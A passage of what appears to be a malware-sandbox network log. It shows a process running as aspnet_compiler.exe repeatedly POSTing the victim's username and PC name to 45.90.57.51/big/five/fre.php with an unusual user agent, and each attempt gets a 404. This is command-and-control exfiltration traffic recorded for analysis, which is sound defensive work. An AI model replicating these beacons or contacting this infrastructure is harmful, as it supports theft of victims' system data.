                  Connection: close
                  May 16, 2024 00:37:04.782536983 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:05.048280001 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.54971245.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:07.254937887 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:07.497780085 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:07.768110037 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.54971345.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:09.170149088 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:09.410101891 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:09.676040888 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.54972245.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:11.067188978 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:11.308711052 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:11.574807882 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.54972345.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:12.990169048 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:13.233370066 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:13.504816055 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.54972445.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:14.907253027 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:15.150247097 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:15.418884993 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.54972545.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:16.803035021 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:17.045828104 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:17.315321922 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.54972645.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:18.705945969 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:18.948765039 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:19.223879099 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.54972745.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:20.628599882 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:20.870028019 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:21.133209944 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.54972845.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:23.884685040 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:24.117247105 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:24.372669935 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.54972945.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:25.750611067 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:25.991564989 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:26.257152081 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.54973045.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:27.656502008 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:27.895728111 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:28.165565014 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.54973145.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:29.556037903 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:29.789896965 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:30.052185059 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.54973245.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:31.431993008 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:31.666939974 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:31.926841974 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.54973345.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:33.315004110 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:33.557179928 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:33.823352098 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.54973445.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:35.199754953 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:35.435014009 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:35.696424961 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.54973545.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:37.130220890 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:37.370995998 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:37.637985945 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.54973645.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:39.020338058 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:39.263248920 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:39.532387972 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.54973745.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:41.744488001 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:41.979351997 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:42.248025894 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.54973845.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:37:43.623424053 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:37:43.856988907 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:37:44.125783920 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:37:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.54973945.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
